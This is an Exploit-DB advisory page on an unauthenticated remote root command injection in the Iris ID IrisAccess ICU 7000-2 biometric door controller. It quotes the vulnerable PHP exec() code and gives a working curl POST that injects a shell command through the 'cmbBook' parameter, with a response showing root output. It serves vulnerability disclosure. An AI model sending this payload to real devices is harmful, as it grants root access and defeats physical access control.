Iris ID IrisAccess ICU 7000-2 - Remote Command Execution

EDB-ID:

40166

CVE:

N/A

EDB Verified:

Author:

LiquidWorm

Type:

webapps

Exploit:   /  

Platform:

CGI

Date:

2016-07-26

Vulnerable App: 

Iris ID IrisAccess ICU 7000-2 Remote Root Command Execution


Vendor: Iris ID, Inc.
Product web page: http://www.irisid.com
                  http://www.irisid.com/productssolutions/hardwareproducts/icu-7000-2/

Affected version: ICU Software: 1.00.08
                  ICU OS: 1.3.8
                  ICU File system: 1.3.8
                  EIF Firmware [Channel 1]: 1.9
                  EIF Firmware [Channel 2]: 1.9
                  Iris TwoPi: 1.4.5

Summary: The ICU 7000-2 is an optional component used when the client requires
iris template data to be matched on the secure side of the door. When using ICU
no data is stored in the iCAM7 Iris Reader itself. The ICU also ensures that portal
operation can continue if the there is an interruption in communication with the
host computer. In such circumstances, the ICU retains the records of portal activity,
then automatically updates the host upon resumption of host communication. Every
ICU in the iCAM4000 / 7 series runs on a LINUX OS for added reliability. Independent
and fault tolerant, ICUs are connected up to 2 iCAMs and handle up to 100,000 users.

Desc: The Iris ID IrisAccess ICU 7000-2 device suffers from an unauthenticated remote
command execution vulnerability. The vulnerability exist due to several POST parameters
in the '/html/SetSmarcardSettings.php' script not being sanitized when using the exec()
PHP function while updating the Smart Card Settings on the affected device. Calling the
'$CommandForExe' variable which is set to call the '/cgi-bin/setsmartcard' CGI binary
with the affected parameters as arguments allows the attacker to execute arbitrary system
commands as the root user and bypass the biometric access control in place.

=====================================================================================

/html/SetSmarCardSettings.php:
------------------------------

53: <?php
54:  $ChNo = $_POST['HidChannelID'];
55:  if(0 == $ChNo )
56:   echo "1";
57:  else
58:   echo $ChNo;
59: ?>
61: <?php
62:  echo "<input type = \"hidden\" name=\"HidChannelID\" value=\"$ChNo\">";	 
63:  echo "<input type=\"hidden\" name=\"ssid\" value=\"1234\">"
64: ?>
81: <td class="menuMain">Smart Card Settings</td>
88: <!-- Content: BOF -->
97: <?php
99:  $FileAvaToUpload = $_POST['HidIsFileSelect'];
100:   //echo "<br>File availabe is: ";
101:   //echo $FileAvaToUpload;
102:   //echo "<br>";
104: $BookVal = $_POST['cmbBook'];
105:   //echo "<br>BookVal is ";
106:   //echo $BookVal;
108:   //echo "<br>Channel value is ";
109:   //echo $ChNo;
111: $OffSet = $_POST['txtOffSet'];
112:   //echo "<br>Offset is ";
113:   //echo $OffSet;
115: $DataFormat = $_POST['DataFormat'];
117:   //echo "<br>DataFormat is ";
118:   //echo $DataFormat;
120: $EncryptAlg = $_POST['EncryAlg'];
122:   if(0 == $DataFormat )
123:   $EncryptAlg = 4;
125:   //echo "<br>Encryption Algarithm is ";
126:   //echo $EncryptAlg;
128: $UseAsProxyCard = $_POST['chkUseAsProxCard'];
129:   if( "" == $UseAsProxyCard )
130:   $UseAsProxyCard = "0";
132:   //echo "<br>Use as ProxyCard is ";
133:   //echo $UseAsProxyCard;
135: $target_dir = "/tmp/temp_SmartCardKey";
137:   //$target_dir = $target_dir . basename( $_FILES["file1"]["name"]);
139: if(1 == $FileAvaToUpload ) {
140:   if (move_uploaded_file($_FILES["file1"]["tmp_name"], $target_dir)) {
141:   //echo "The file ". basename( $_FILES["file1"]["name"]). " has been uploaded.";
142:   } else {
143:   //echo "Sorry, there was an error uploading your file.";
144:   }
145: }
147: $out = null;
148: $rc= 0;
149: $CommandForExe = "../cgi-bin/setsmartcard  $ChNo $BookVal $OffSet $DataFormat $EncryptAlg $UseAsProxyCard $FileAvaToUpload";
150: //$CommandForExe = "../cgi-bin/setsmartcard  1 0 10 1 1 0";
151: echo exec($CommandForExe, $out, $rc);
153:   //print_r( $out);
154:   //echo 'rc = '.$rc."\n";      
156:   //echo "After calling binary";
158:   //echo "Return value is: ";
159:   //echo $rc;
160:   //echo $out;
162: $sICUVersion = $_POST['HidVerForPHP'];
163: ?>

=====================================================================================

Vulnerable parameters: DataFormat
                       EncryAlg
                       HidChannelID
                       HidIsFileSelect
                       cmbBook
                       txtOffSet


Tested on: GNU/Linux 3.0.51 (armv7l)
           mylighttpd v1.0
           PHP/5.5.13


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2016-5346
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5346.php


06.05.2016

--


Request (cmbBook=0|id #):
-------------------------

[lqwrm@lalaland /]# curl -i -s -k  -X 'POST' \
-H 'User-Agent: joxypoxy/7.2.6' -H 'Content-Type: application/x-www-form-urlencoded' \
--data-binary $'HidChannelID=2&HidcmbBook=0&cmbBook=0|id+%23&HidDisOffSet=13&txtOffSet=37&HidDataFormat=1&HidDataFormatVal=1&DataFormat=1&HidFileAvailable=0&HidEncryAlg=0&EncryAlg=0&HidFileType=0&HidIsFileSelect=0&HidUseAsProxCard=0&HidVerForPHP=1.00.08\x0d\x0a' \
'http://[TARGET]/html/SetSmarcardSettings.php'


Response:
---------

HTTP/1.1 200 OK
X-Powered-By: PHP/5.5.13
Content-type: text/html
Connection: close
Date: Thu, 09 May 2016 14:40:39 GMT
Server:  mylighttpd v1.0
Content-Length: 11660

...
</tr>
uid=0(root) gid=0(root)         <tr>
<td colspan="2">
...
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services